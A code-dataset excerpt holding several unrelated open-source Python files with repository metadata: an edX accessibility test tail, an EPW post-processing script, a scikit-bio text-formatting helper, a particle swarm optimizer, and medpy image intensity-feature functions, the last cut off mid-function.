        self.cache_programs()

        self.details_page.visit()
        self.details_page.a11y_audit.check_for_accessibility_errors()
|
teltek/edx-platform
|
common/test/acceptance/tests/lms/test_programs.py
|
Python
|
agpl-3.0
| 5,873
|
[
"VisIt"
] |
402394032a3bf650efe97af495a0f133978a513afc667803d3755a349aaf580d
|
#
# Post-processing script QE --> EPW
# 14/07/2015 - Samuel Ponce
#
import numpy as np
import os

# Prefix used by the preceding PH calculation (e.g. 'diam').
prefix = str(raw_input('Enter the prefix used for PH calculations (e.g. diam)\n'))

# Number of irreducible q-points produced by the PH run.
user_input = raw_input('Enter the number of irreducible q-points\n')
nqpt = user_input
try:
    nqpt = int(user_input)
except ValueError:
    raise Exception('The value you enter is not an integer!')

# Collect everything EPW needs into a single 'save' directory.
os.system('mkdir save')

for iqpt in np.arange(1, nqpt + 1):
    label = str(iqpt)

    # Dynamical matrix for this q-point.
    os.system('cp ' + prefix + '.dyn' + str(iqpt) + ' save/' + prefix + '.dyn_q' + label)

    if (iqpt == 1):
        # q = 1: dvscf and the phsave directory live directly under _ph0/.
        os.system('cp _ph0/' + prefix + '.dvscf1 save/' + prefix + '.dvscf_q' + label)
        os.system('cp -r _ph0/' + prefix + '.phsave save/')
    else:
        # Other q-points keep their dvscf in a per-q subdirectory; also drop
        # the (large, no longer needed) wavefunction files there.
        os.system('cp _ph0/' + prefix + '.q_' + str(iqpt) + '/' + prefix + '.dvscf1 save/' + prefix + '.dvscf_q' + label)
        os.system('rm _ph0/' + prefix + '.q_' + str(iqpt) + '/*wfc*' )
|
mmdg-oxford/papers
|
Verdi-NCOMMS-2017/code/EPW/tests/Inputs/t05/pp.py
|
Python
|
gpl-3.0
| 943
|
[
"EPW"
] |
fac55c3edaafc3f17ea1e001f04b91191cf1821f7cd7b71afcf8949aba4993ba
|
# ----------------------------------------------------------------------------
# Copyright (c) 2013--, scikit-bio development team.
#
# Distributed under the terms of the Modified BSD License.
#
# The full license is in the file COPYING.txt, distributed with this software.
# ----------------------------------------------------------------------------
from __future__ import absolute_import, division, print_function
class ElasticLines(object):
    """Collect content lines and separator markers, rendering each separator
    as a dashed line exactly as wide as the longest content line seen.
    """

    def __init__(self):
        # Content lines; separator positions temporarily hold None.
        self._lines = []
        # Indices into _lines where separators were inserted.
        self._separator_idxs = []
        # Width of the widest content line so far (-1 while empty).
        self._max_line_len = -1

    def add_line(self, line):
        """Append one content line, tracking the maximum line width."""
        self._max_line_len = max(self._max_line_len, len(line))
        self._lines.append(line)

    def add_lines(self, lines):
        """Append every element of *lines* as a content line."""
        for single in lines:
            self.add_line(single)

    def add_separator(self):
        """Append a separator; its final width is decided at render time."""
        self._separator_idxs.append(len(self._lines))
        self._lines.append(None)

    def to_str(self):
        """Render all lines, materializing separators as runs of dashes."""
        dashes = '-' * self._max_line_len
        for idx in self._separator_idxs:
            self._lines[idx] = dashes
        return '\n'.join(self._lines)
|
xguse/scikit-bio
|
skbio/sequence/_base.py
|
Python
|
bsd-3-clause
| 1,304
|
[
"scikit-bio"
] |
cd3613d3f9cd4202a39cb222d6dccbbfc41c0a2e7adfa20db085ca696490550c
|
#!/usr/bin/env python
"""
Artificial Intelligence for Humans
Volume 2: Nature-Inspired Algorithms
Python Version
http://www.aifh.org
http://www.jeffheaton.com
Code repository:
https://github.com/jeffheaton/aifh
Copyright 2014 by Jeff Heaton
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
For more information on Heaton Research copyrights, licenses
and trademarks visit:
http://www.heatonresearch.com/copyright
"""
from random import *
import numpy as np
class TrainPSO:
    """Particle Swarm Optimization (PSO) trainer.

    Maintains a swarm of candidate parameter vectors ("particles"), each with
    a velocity, a personal best position, and a shared global best. Each
    iteration updates velocities from the inertia, cognitive (personal best),
    and social (global best) terms, moves the particles, and re-scores them.
    """

    def __init__(self, particle_count, param_count, score_function):
        # The current error.
        self.current_error = 0
        # The scoring function; determines the energy (error) of a candidate vector.
        self.score_function = score_function
        # When True, lower scores are better.
        self.goal_minimize = True
        # When True, train() prints the best score each iteration.
        self.display_iteration = True

        # Swarm state and memories.
        self.param_count = param_count
        self.particles = np.zeros([particle_count, param_count], dtype=float)
        self.velocities = np.zeros([particle_count, param_count], dtype=float)
        self.best_vectors = np.zeros([particle_count, param_count], dtype=float)
        self.best_scores = np.zeros([particle_count], dtype=float)
        # Index of the particle currently holding the global best (-1 until set).
        self.best_vector_index = -1

        # Determines the size of the search space: position components are
        # bounded to [-max_position, max_position]. A well chosen range can
        # improve performance. -1 is a special value meaning unbounded.
        self.max_position = -1

        # Maximum change one particle can take during one iteration; limits the
        # absolute value of each velocity component. Affects search granularity:
        # too high and particles fly past the optimum, too low and they get
        # stuck in local minima. Usually a fraction (~10%) of the dynamic range
        # of the search space. -1 is a special value meaning unbounded.
        self.max_velocity = 2

        # c1, cognitive learning rate >= 0: tendency to return to the
        # particle's personal best position.
        self.c1 = 2.0
        # c2, social learning rate >= 0: tendency to move towards the swarm's
        # best position.
        self.c2 = 2.0

        # w, inertia weight. Controls global (higher) vs local exploration;
        # analogous to temperature in simulated annealing. Usually in (0, 1).
        self.inertia_weight = 0.4

        # Random initial positions and velocities.
        for row in range(0, particle_count):
            for col in range(0, param_count):
                self.particles[row][col] = uniform(-1, 1)
            for col in range(0, param_count):
                self.velocities[row][col] = uniform(-self.max_velocity, self.max_velocity)

    def clamp_components(self, v, max_value):
        """Clamp every component of v to [-max_value, max_value] in place.

        A max_value of -1 means unbounded; v is left untouched.
        """
        if max_value != -1:
            for i in range(0, len(v)):
                if v[i] > max_value:
                    v[i] = max_value
                if v[i] < -max_value:
                    v[i] = -max_value

    def update_velocity(self, particle_index):
        """Standard PSO velocity update: inertia, cognitive, and social terms."""
        # Inertia: damp the previous velocity.
        for i in range(0, self.param_count):
            self.velocities[particle_index][i] *= self.inertia_weight

        for i in range(0, self.param_count):
            # Cognitive term: pull toward this particle's personal best.
            ct = (self.best_vectors[particle_index][i]
                  - self.particles[particle_index][i]) * uniform(0, 1) * self.c1
            self.velocities[particle_index][i] += ct

            # Social term: pull toward the swarm's global best. The global-best
            # particle itself receives no social pull.
            # BUG FIX: this term was previously scaled by c1; the social term
            # must use the social learning rate c2.
            if particle_index != self.best_vector_index:
                st = (self.best_vectors[self.best_vector_index][i]
                      - self.particles[particle_index][i]) * uniform(0, 1) * self.c2
                self.velocities[particle_index][i] += st

    def update_personal_best_position(self, particle_index, particle_position):
        """Re-score a particle and refresh its personal best if improved.

        particle_position is unused (the particle's stored position is scored);
        it is kept in the signature for backward compatibility.
        """
        score = self.score_function(self.particles[particle_index])

        # A stored score of exactly 0 is treated as "not yet scored"; note this
        # also re-accepts any particle whose true score happens to be 0.
        if self.best_scores[particle_index] == 0 or self.is_score_better(score, self.best_scores[particle_index]):
            self.best_scores[particle_index] = score
            for i in range(0, self.param_count):
                self.best_vectors[particle_index][i] = self.particles[particle_index][i]

    def is_score_better(self, score1, score2):
        """True if score1 beats score2 under the current optimization goal."""
        return (self.goal_minimize and (score1 < score2)) \
            or (not self.goal_minimize and (score1 > score2))

    def update_particle(self, particle_index):
        """Advance one particle: velocity update, move, clamp, re-score."""
        self.update_velocity(particle_index)

        # Velocity clamping.
        self.clamp_components(self.velocities[particle_index], self.max_velocity)

        # New position (Xt = Xt-1 + Vt).
        for i in range(0, self.param_count):
            self.particles[particle_index][i] += self.velocities[particle_index][i]

        # Pin the particle against the boundary of the search space
        # (only components exceeding max_position are clamped).
        self.clamp_components(self.particles[particle_index], self.max_position)

        self.update_personal_best_position(particle_index, self.particles[particle_index])

    def update_global_best_position(self):
        """Select the particle whose personal best is the swarm's global best."""
        for i in range(0, len(self.particles)):
            if self.best_vector_index == -1 \
                    or self.is_score_better(self.best_scores[i], self.best_scores[self.best_vector_index]):
                self.best_vector_index = i

    def iteration(self):
        """Run one full swarm update followed by a global-best refresh."""
        for i in range(0, len(self.particles)):
            self.update_particle(i)
        self.update_global_best_position()

    def get_best(self):
        """Return the best parameter vector found so far."""
        return self.best_vectors[self.best_vector_index]

    def get_best_score(self):
        """Return the score of the best parameter vector found so far."""
        return self.best_scores[self.best_vector_index]

    def copy_best(self, target):
        """Copy the best parameter vector into the supplied sequence."""
        b = self.get_best()
        for i in range(len(b)):
            target[i] = b[i]

    def train(self, max_iterations=100):
        """Run up to max_iterations swarm iterations, optionally printing progress."""
        for i in range(0, max_iterations):
            self.iteration()
            if self.display_iteration:
                print("Iteration #" + str(i) + ", best score=" + str(self.best_scores[self.best_vector_index]))
|
PeterLauris/aifh
|
vol2/vol2-python-examples/lib/aifh/pso.py
|
Python
|
apache-2.0
| 7,032
|
[
"VisIt"
] |
fa734eae8e62769ceee1f407a1a2127484a02fefa6bfe6cba1f5849e7a677502
|
"""
@package medpy.features.intensity
Functions to extracts voxel-wise intensity based features from images.
Feature representation:
Features can be one or more dimensional and are kept in the following structures:
s1 s2 s3 [...]
f1.1
f1.2
f2.1
f3.1
f3.2
[...]
, where each column sX denotes a single sample (voxel) and each row a feature element
e.g. f1 constitutes a 2-dimensional feature and therefore occupies two rows, while
f2 is a single-element feature with a single row. Entries of this array are of type
float.
These feature representation forms are processable by the scikit-learn machine learning
methods.
Multi-spectral images:
This package was originally designed for MR images and is therefore suited to handle
multi-spectral data such as RGB and MR images. Each feature extraction function can be
supplied with a list/tuple of images instead of an image, in which case they are considered
co-registered and the feature is extracted from each of them independently.
@author Oskar Maier
@version r0.2.3
@since 2013-08-24
@status Release
"""
# build-in module
# third-party modules
import numpy
from scipy.ndimage.filters import gaussian_filter, gaussian_gradient_magnitude,\
median_filter
from scipy.interpolate.interpolate import interp1d
from scipy.ndimage._ni_support import _get_output
# own modules
from medpy.features import utilities
from medpy.core.exceptions import ArgumentError
from medpy.features.utilities import join
from medpy.filter.image import sum_filter
# constants
def intensities(image, mask = slice(None)):
    """
    Voxel-wise intensity values of a simple or multi-spectral image.

    A multi-spectral image must be supplied as a list or tuple of its spectra.
    Optionally a binary mask can be supplied to restrict the voxels for which
    the feature is extracted.

    @param image a single image or a list/tuple of images (for multi-spectral case)
    @type image ndarray | list of ndarrays | tuple of ndarrays
    @param mask a binary mask for the image
    @type mask ndarray
    @return the images intensities
    @type ndarray
    """
    return __extract_feature(__extract_intensities, image, mask)
def centerdistance(image, voxelspacing = None, mask = slice(None)):
    """
    Takes a simple or multi-spectral image and returns its voxel-wise center distance in
    mm. A multi-spectral image must be supplied as a list or tuple of its spectra.
    Optionally a binary mask can be supplied to select the voxels for which the feature
    should be extracted.
    The center distance is the exact euclidean distance in mm of each voxels center to
    the central point of the overal image volume.
    Note that this feature is independent of the actual image content, but depends
    solely on its shape. Therefore always a one-dimensional feature is returned, even if
    a multi-spectral image has been supplied.

    @param image a single image or a list/tuple of images (for multi-spectral case)
    @type image ndarray | list of ndarrays | tuple of ndarrays
    @param voxelspacing the side-length of each voxel
    @type voxelspacing sequence of floats
    @param mask a binary mask for the image
    @type mask ndarray
    @return the distance of each voxel to the images center
    @type ndarray
    """
    # Shape-only feature: for multi-spectral input every spectrum yields the
    # same result, so only the first image is used.
    if isinstance(image, (tuple, list)):
        image = image[0]

    return __extract_feature(__extract_centerdistance, image, mask, voxelspacing = voxelspacing)
def centerdistance_xdminus1(image, dim, voxelspacing = None, mask = slice(None)):
    """
    Implementation of @see centerdistance that allows to compute sub-volume wise
    centerdistances.
    The same notes as for @see centerdistance apply.

    Example:
    Considering a 3D medical image we want to compute the axial slice-wise
    centerdistances instead of the ones over the complete image volume. Assuming that
    the third image dimension corresponds to the axial axes of the image, we call
    centerdistance_xdminus1(image, 2)
    Note that the centerdistance of each slice is the same.

    @param image a single image or a list/tuple of images (for multi-spectral case)
    @type image ndarray | list of ndarrays | tuple of ndarrays
    @param dim the dimension or dimensions along which to cut the image into sub-volumes
    @type dim int | sequence of ints
    @param voxelspacing the side-length of each voxel
    @type voxelspacing sequence of floats
    @param mask a binary mask for the image
    @type mask ndarray
    @return the distance of each voxel to the images center
    @type ndarray
    @raises ArgumentError if a invalid dim index of number of dim indices were supplied
    """
    # pre-process arguments (shape-only feature: first spectrum suffices)
    if isinstance(image, (tuple, list)):
        image = image[0]

    if isinstance(dim, int):
        dims = [dim]
    else:
        dims = list(dim)

    # check arguments
    if len(dims) >= image.ndim - 1:
        raise ArgumentError('Applying a sub-volume extraction of depth {} on a image of dimensionality {} would lead to invalid images of dimensionality <= 1.'.format(len(dims), image.ndim))
    for dim in dims:
        if dim >= image.ndim:
            raise ArgumentError('Invalid dimension index {} supplied for image(s) of shape {}.'.format(dim, image.shape))

    # extract desired sub-volume (first slice along every cut dimension);
    # indexing with a tuple, as list-of-slices indexing was removed from numpy
    slicer = [slice(None)] * image.ndim
    for dim in dims:
        slicer[dim] = slice(1)
    subvolume = numpy.squeeze(image[tuple(slicer)])

    # compute centerdistance for sub-volume and reshape to original sub-volume shape
    # (note that normalization and mask are not passed on in this step)
    o = centerdistance(subvolume, voxelspacing).reshape(subvolume.shape)

    # re-establish original shape by copying the resulting array multiple times
    for dim in sorted(dims):
        o = numpy.asarray([o] * image.shape[dim])
        o = numpy.rollaxis(o, 0, dim + 1)

    # extract intensities / centerdistance values, applying normalization and mask in this step
    return intensities(o, mask)
def indices(image, voxelspacing = None, mask = slice(None)):
    """
    Takes an image and returns the voxels ndim-indices as voxel-wise feature. The voxel
    spacing is taken into account, i.e. the indices are not array indices, but millimeter
    indices.
    This is a multi-element feature where each element corresponds to one of the images
    axes, e.g. x, y, z, ...
    Note that this feature is independent of the actual image content, but depends
    solely on its shape. Therefore always a one-dimensional feature is returned, even if
    a multi-spectral image has been supplied.

    @param image a single image or a list/tuple of images (for multi-spectral case)
    @type image ndarray | list of ndarrays | tuple of ndarrays
    @param voxelspacing the side-length of each voxel
    @type voxelspacing sequence of floats
    @param mask a binary mask for the image
    @type mask ndarray
    @return each voxel ndim-index
    @type ndarray
    """
    # Shape-only feature: for multi-spectral input the first image suffices.
    if isinstance(image, (tuple, list)):
        image = image[0]

    if not isinstance(mask, slice):
        # numpy.bool was a removed alias for the builtin bool
        mask = numpy.array(mask, copy=False, dtype=bool)

    if voxelspacing is None:
        voxelspacing = [1.] * image.ndim

    # Scale each axis' index grid by its voxel spacing. (Rewritten from a
    # Python-2-only tuple-parameter lambda, which is a SyntaxError on Python 3.)
    return join(*[a[mask].ravel() * vs
                  for a, vs in zip(numpy.indices(image.shape), voxelspacing)])
def local_mean_gauss(image, sigma = 5, voxelspacing = None, mask = slice(None)):
    """
    Approximate local mean intensity around every voxel, obtained by Gaussian
    smoothing of the image (or of each spectrum of a multi-spectral image,
    supplied as a list/tuple) and returning the smoothed intensity values.

    Optionally a binary mask can be supplied to select the voxels for which the
    feature should be extracted.

    @param image a single image or a list/tuple of images (for multi-spectral case)
    @type image ndarray | list of ndarrays | tuple of ndarrays
    @param sigma Standard deviation for Gaussian kernel. The standard deviations of the Gaussian filter are given for each axis as a sequence, or as a single number, in which case it is equal for all axes. Note that the voxel spacing of the image is taken into account, the given values are treated as mm.
    @type sigma scalar or sequence of scalars
    @param voxelspacing the side-length of each voxel
    @type voxelspacing sequence of floats
    @param mask a binary mask for the image
    @type mask ndarray
    @return the images intensities
    @type ndarray
    """
    return __extract_feature(__extract_local_mean_gauss, image, mask,
                             voxelspacing = voxelspacing, sigma = sigma)
def guassian_gradient_magnitude(image, sigma = 5, voxelspacing = None, mask = slice(None)):
    """
    Gradient magnitude (edge-detection) of the supplied image, computed using
    Gaussian derivatives; the resulting intensity values are returned.

    Optionally a binary mask can be supplied to select the voxels for which the
    feature should be extracted.

    Note: the misspelling "guassian" in the function name is part of the public
    API and is therefore kept.

    @param image a single image or a list/tuple of images (for multi-spectral case)
    @type image ndarray | list of ndarrays | tuple of ndarrays
    @param sigma Standard deviation for Gaussian kernel. The standard deviations of the Gaussian filter are given for each axis as a sequence, or as a single number, in which case it is equal for all axes. Note that the voxel spacing of the image is taken into account, the given values are treated as mm.
    @type sigma scalar or sequence of scalars
    @param voxelspacing the side-length of each voxel
    @type voxelspacing sequence of floats
    @param mask a binary mask for the image
    @type mask ndarray
    @return the images intensities
    @type ndarray
    """
    return __extract_feature(__extract_guassian_gradient_magnitude, image, mask,
                             voxelspacing = voxelspacing, sigma = sigma)
def median(image, size = 5, voxelspacing = None, mask = slice(None)):
    """
    Multi-dimensional median filter response, returned per voxel.

    Optionally a binary mask can be supplied to select the voxels for which the
    feature should be extracted.

    @param image a single image or a list/tuple of images (for multi-spectral case)
    @type image ndarray | list of ndarrays | tuple of ndarrays
    @param size Size of the structuring element. Can be given given for each axis as a sequence, or as a single number, in which case it is equal for all axes. Note that the voxel spacing of the image is taken into account, the given values are treated as mm.
    @type size scalar or sequence of scalars
    @param voxelspacing the side-length of each voxel
    @type voxelspacing sequence of floats
    @param mask a binary mask for the image
    @type mask ndarray
    @return the images intensities
    @type ndarray
    """
    return __extract_feature(__extract_median, image, mask,
                             voxelspacing = voxelspacing, size = size)
def local_histogram(image, bins=19, rang="image", cutoffp=(0.0, 100.0), size=None, footprint=None, output=None, mode="ignore", origin=0, mask=slice(None)):
    """
    Multi-dimensional histograms over a region around each voxel.

    Supply an image and (optionally) a mask to obtain, for every voxel, the
    histogram of the local neighbourhood around it. Neighbourhoods are cubic
    with a sidelength of size in voxels or, when a shape instead of an integer
    is passed to size, of this shape.

    If no argument is passed to output, the returned array will be of dtype float.

    Voxels along the image border are treated as defined by mode. The possible
    values are the same as for scipy.ndimage filters without the ''constant''
    mode. Instead "ignore" is the default and additional mode, which causes the
    area outside of the image to be ignored when computing the histogram.

    When a mask is supplied, the local histogram is extracted only for the
    voxels where the mask is True. But voxels from outside the mask can be
    incorporated in the computation of the histograms.

    The range of the histograms can be set via the rang argument. The 'image'
    keyword can be supplied, to use the same range for all local histograms,
    extracted from the images max and min intensity values. Alternatively, an
    own range can be supplied in the form of a tuple of two numbers. Values
    outside the range of the histogram are ignored.

    Setting a proper range is important, as all voxels that lie outside of the
    range are ignored i.e. do not contribute to the histograms as if they would
    not exist. Some of the local histograms can therefore be constructed from
    less than the expected number of voxels.

    Taking the histogram range from the whole image is sensitive to outliers.
    Supplying percentile values to the cutoffp argument, these can be filtered
    out when computing the range. This keyword is ignored if rang is not set
    to 'image'.

    Setting the rang to None causes local ranges to be used i.e. the ranges of
    the histograms are computed only over the local area covered by them and
    are hence not comparable. This behaviour should normally not be taken.

    The local histograms are normalized by dividing them through the number of
    elements in the bins.

    @param image a single image or a list/tuple of images (for multi-spectral case)
    @type image ndarray | list of ndarrays | tuple of ndarrays
    @param bins the number of histogram bins
    @type bins integer
    @param rang the range of the histograms, can be supplied manually, set to 'image' or
                set to None to use local ranges
    @type rang string | tuple of numbers | None
    @param cutoffp the cut-off percentiles to exclude outliers, only processed if rang is
                   set to 'image'
    @type cutoffp tuple of scalars | 'image'
    @param size See footprint, below
    @type size scalar | tuple
    @param footprint Either ``size`` or ``footprint`` must be defined. ``size`` gives the shape that is taken from the input array, at every element position, to define the input to the filter function. ``footprint`` is a boolean array that specifies (implicitly) a shape, but also which of the elements within this shape will get passed to the filter function. Thus ``size=(n,m)`` is equivalent to ``footprint=np.ones((n,m))``. We adjust ``size`` to the number of dimensions of the input array, so that, if the input array is shape (10,10,10), and ``size`` is 2, then the actual size used is (2,2,2).
    @type footprint ndarray
    @param output The ``output`` parameter passes an array in which to store the filter output.
    @type output ndarray | dtype
    @param mode The ``mode`` parameter determines how the array borders are handled. Default is 'ignore'
    @type mode 'reflect' | 'ignore' | 'nearest' | 'mirror' | 'wrap'
    @param origin The ``origin`` parameter controls the placement of the filter. Default 0.
    @type origin scalar
    @param mask a binary mask for the image
    @type mask ndarray
    @return the bin values of the local histograms for each voxel
    @rtype ndarray
    """
    return __extract_feature(__extract_local_histogram, image, mask,
                             bins=bins, rang=rang, cutoffp=cutoffp, size=size,
                             footprint=footprint, output=output, mode=mode,
                             origin=origin)
def hemispheric_difference(image, sigma_active = 7, sigma_reference = 7, cut_plane = 0, voxelspacing = None, mask = slice(None)):
    """
    Hemispheric intensity difference between the brain hemispheres of a brain image.

    The image is cut along the middle of the supplied cut-plane, resulting in
    two images, one per hemisphere. For each of the two, the following steps
    are applied:

    1. One image is marked as active image
    2. The other hemisphere image is marked as reference image
    3. The reference image is fliped along the cut_plane
    4. A gaussian smoothing is applied to the active image with the supplied sigma
    5. A gaussian smoothing is applied to the reference image with the supplied sigma
    6. The reference image is substracted from the active image, resulting in the
       difference image for the active hemisphere

    Finally, the two resulting difference images are stitched back together,
    forming a hemispheric difference image of the same size as the original.

    Note that the supplied gaussian kernel sizes (sigmas) are sensitive to the
    images voxel spacing.

    Note: if the number of slices along the cut-plane is odd, the central slice
    is interpolated from the two hemisphere difference images when stitching
    them back together.

    @param image a single image or a list/tuple of images (for multi-spectral case)
    @type image ndarray | list of ndarrays | tuple of ndarrays
    @param sigma_active Standard deviation for Gaussian kernel of the active image. The standard deviations of the Gaussian filter are given for each axis as a sequence, or as a single number, in which case it is equal for all axes. Note that the voxel spacing of the image is taken into account, the given values are treated as mm.
    @type sigma_active scalar or sequence of scalars
    @param sigma_reference Standard deviation for Gaussian kernel of the reference image. The standard deviations of the Gaussian filter are given for each axis as a sequence, or as a single number, in which case it is equal for all axes. Note that the voxel spacing of the image is taken into account, the given values are treated as mm.
    @type sigma_reference scalar or sequence of scalars
    @param cut_plane The axes along which to cut. This is usually the coronal plane.
    @type cut_plane int
    @param voxelspacing the side-length of each voxel
    @type voxelspacing sequence of floats
    @param mask a binary mask for the image
    @type mask ndarray
    @return the bin values of the local histograms for each voxel
    @rtype ndarray
    @raise ArgumentError If the supplied cut-plane dimension is invalid.
    """
    return __extract_feature(__extract_hemispheric_difference, image, mask,
                             voxelspacing = voxelspacing, cut_plane = cut_plane,
                             sigma_active = sigma_active,
                             sigma_reference = sigma_reference)
def __extract_hemispheric_difference(image, mask = slice(None), sigma_active = 7, sigma_reference = 7, cut_plane = 0, voxelspacing = None):
    """
    Internal, single-image version of @see hemispheric_difference
    """
    # constants
    # how many neighbouring slices to take into account when interpolating the
    # medial longitudinal fissure slice
    INTERPOLATION_RANGE = int(10)

    # check arguments (typo "suppliedc" fixed in the error message)
    if cut_plane >= image.ndim:
        raise ArgumentError('The supplied cut-plane ({}) is invalid, the image has only {} dimensions.'.format(cut_plane, image.ndim))

    # set default voxel spacing
    if voxelspacing is None:
        voxelspacing = [1.] * image.ndim

    # compute the (presumed) location of the medial longitudinal fissure,
    # treating also the special case of an odd number of slices, in which case
    # a cut into two equal halves is not possible
    medial_longitudinal_fissure = int(image.shape[cut_plane] / 2)
    medial_longitudinal_fissure_excluded = image.shape[cut_plane] % 2

    # split the head into a dexter and sinister half along the saggital plane;
    # this is assumed to be consistent with a cut of the brain along the medial
    # longitudinal fissure, thus separating it into its hemispheres
    # (slicer lists are converted to tuples at indexing time, since indexing
    # ndarrays with lists of slices was removed from numpy)
    slicer = [slice(None)] * image.ndim
    slicer[cut_plane] = slice(None, medial_longitudinal_fissure)
    left_hemisphere = image[tuple(slicer)]

    slicer[cut_plane] = slice(medial_longitudinal_fissure + medial_longitudinal_fissure_excluded, None)
    right_hemisphere = image[tuple(slicer)]

    # flip right hemisphere image along cut plane
    slicer[cut_plane] = slice(None, None, -1)
    right_hemisphere = right_hemisphere[tuple(slicer)]

    # substract once left from right and once right from left hemisphere,
    # including smoothing steps
    right_hemisphere_difference = __substract_hemispheres(right_hemisphere, left_hemisphere, sigma_active, sigma_reference, voxelspacing)
    left_hemisphere_difference = __substract_hemispheres(left_hemisphere, right_hemisphere, sigma_active, sigma_reference, voxelspacing)

    # re-flip right hemisphere image to original orientation (slicer still
    # holds the flip for the cut plane)
    right_hemisphere_difference = right_hemisphere_difference[tuple(slicer)]

    # estimate the medial longitudinal fissure slice if it was excluded above
    if 1 == medial_longitudinal_fissure_excluded:
        left_slicer = [slice(None)] * image.ndim
        right_slicer = [slice(None)] * image.ndim
        left_slicer[cut_plane] = slice(-1 * INTERPOLATION_RANGE, None)
        right_slicer[cut_plane] = slice(None, INTERPOLATION_RANGE)
        interp_data_left = left_hemisphere_difference[tuple(left_slicer)]
        interp_data_right = right_hemisphere_difference[tuple(right_slicer)]
        # negative indices left of the fissure, positive to the right; the
        # fissure itself is interpolated at index 0
        interp_indices_left = list(range(-1 * interp_data_left.shape[cut_plane], 0))
        interp_indices_right = list(range(1, interp_data_right.shape[cut_plane] + 1))
        interp_data = numpy.concatenate((interp_data_left, interp_data_right), cut_plane)
        interp_indices = numpy.concatenate((interp_indices_left, interp_indices_right), 0)
        medial_longitudinal_fissure_estimated = interp1d(interp_indices, interp_data, kind='cubic', axis=cut_plane)(0)
        # add singleton dimension so the slice can be concatenated in between
        slicer[cut_plane] = numpy.newaxis
        medial_longitudinal_fissure_estimated = medial_longitudinal_fissure_estimated[tuple(slicer)]

    # stich images back together
    if 1 == medial_longitudinal_fissure_excluded:
        hemisphere_difference = numpy.concatenate((left_hemisphere_difference, medial_longitudinal_fissure_estimated, right_hemisphere_difference), cut_plane)
    else:
        hemisphere_difference = numpy.concatenate((left_hemisphere_difference, right_hemisphere_difference), cut_plane)

    # extract intensities and return
    return __extract_intensities(hemisphere_difference, mask)
def __extract_local_histogram(image, mask=slice(None), bins=19, rang="image", cutoffp=(0.0, 100.0), size=None, footprint=None, output=None, mode="ignore", origin=0):
    """
    Internal, single-image version of @see local_histogram

    Builds, for every voxel, a local neighbourhood histogram with `bins` bins
    over the range `rang` and returns the masked histogram features.

    Note: Values outside of the histograms range are not considered.
    Note: Mode constant is not available, instead a mode "ignore" is provided.
    Note: Default dtype of returned values is float.
    """
    if "constant" == mode:
        raise RuntimeError('boundary mode not supported')
    elif "ignore" == mode:
        # "ignore" is realised as a zero-padded constant border for the sum filter
        mode = "constant"
    if 'image' == rang:
        # derive the histogram range from the masked image's percentiles
        rang = tuple(numpy.percentile(image[mask], cutoffp))
    elif not 2 == len(rang):
        raise RuntimeError('the rang must contain exactly two elements or the string "image"')
    _, bin_edges = numpy.histogram([], bins=bins, range=rang)
    # Bugfix: `None == output` performs an element-wise comparison when a
    # pre-allocated ndarray is passed, making the conditional ambiguous;
    # `numpy.float` was removed in NumPy 1.24 — builtin float is the replacement.
    output, _ = _get_output(float if output is None else output, image, shape = [bins] + list(image.shape))
    # threshold the image into the histogram bins represented by the output images first dimension, treat last bin separately, since upper border is inclusive
    for i in range(bins - 1):
        output[i] = (image >= bin_edges[i]) & (image < bin_edges[i + 1])
    output[-1] = (image >= bin_edges[-2]) & (image <= bin_edges[-1])
    # apply the sum filter to each dimension, then normalize by dividing through the sum of elements in the bins of each histogram
    for i in range(bins):
        output[i] = sum_filter(output[i], size=size, footprint=footprint, output=None, mode=mode, cval=0.0, origin=origin)
    divident = numpy.sum(output, 0)
    divident[0 == divident] = 1
    output /= divident
    # Notes on modes:
    # mode=constant with a cval outside histogram range for the histogram equals a mode=constant with a cval = 0 for the sum_filter
    # mode=constant with a cval inside histogram range for the histogram has no equal for the sum_filter (and does not make much sense)
    # mode=X for the histogram equals mode=X for the sum_filter
    # treat as multi-spectral image which intensities to extracted
    return __extract_feature(__extract_intensities, [h for h in output], mask)
def __extract_median(image, mask = slice(None), size = 1, voxelspacing = None):
    """
    Internal, single-image version of @see median
    Applies a median filter of the requested physical size (mm) and returns
    the filtered intensities of the masked voxels.
    """
    # fall back to isotropic unit spacing when none is supplied
    spacing = [1.] * image.ndim if voxelspacing is None else voxelspacing
    # convert the mm-based structure size into per-dimension voxel units
    voxel_size = __create_structure_array(size, spacing)
    filtered = median_filter(image, voxel_size)
    return __extract_intensities(filtered, mask)
def __extract_guassian_gradient_magnitude(image, mask = slice(None), sigma = 1, voxelspacing = None):
    """
    Internal, single-image version of @see guassian_gradient_magnitude
    Computes the gaussian gradient magnitude (sigma given in mm) and returns
    the intensities of the masked voxels.
    """
    # fall back to isotropic unit spacing when none is supplied
    spacing = voxelspacing if voxelspacing is not None else [1.] * image.ndim
    # express the mm-based sigma in voxel units for each dimension
    kernel = __create_structure_array(sigma, spacing)
    return __extract_intensities(gaussian_gradient_magnitude(image, kernel), mask)
def __extract_local_mean_gauss(image, mask = slice(None), sigma = 1, voxelspacing = None):
    """
    Internal, single-image version of @see local_mean_gauss
    Gaussian-smoothes the image (sigma given in mm) and returns the masked
    intensities of the result.
    """
    if voxelspacing is None:
        # assume isotropic unit spacing
        voxelspacing = [1.] * image.ndim
    # translate the mm-based sigma into per-dimension voxel units
    voxel_sigma = __create_structure_array(sigma, voxelspacing)
    smoothed = gaussian_filter(image, voxel_sigma)
    return __extract_intensities(smoothed, mask)
def __extract_centerdistance(image, mask = slice(None), voxelspacing = None):
    """
    Internal, single-image version of @see centerdistance

    Returns, for every masked voxel, its euclidean distance (in real-world
    units, via the voxel spacing) to the image center.
    """
    image = numpy.array(image, copy=False)
    # Fixed: `None == voxelspacing` is fragile (array-likes compare
    # element-wise); `is None` also matches the sibling functions' style.
    if voxelspacing is None:
        voxelspacing = [1.] * image.ndim
    # get image center and an array holding the images indices
    centers = [(x - 1) / 2. for x in image.shape]
    # Fixed: the `numpy.float` alias was removed in NumPy 1.24; builtin float
    # is the documented replacement.
    indices = numpy.indices(image.shape, dtype=float)
    # shift to center of image and correct spacing to real world coordinates
    for dim_indices, c, vs in zip(indices, centers, voxelspacing):
        dim_indices -= c
        dim_indices *= vs
    # compute euclidean distance to image center
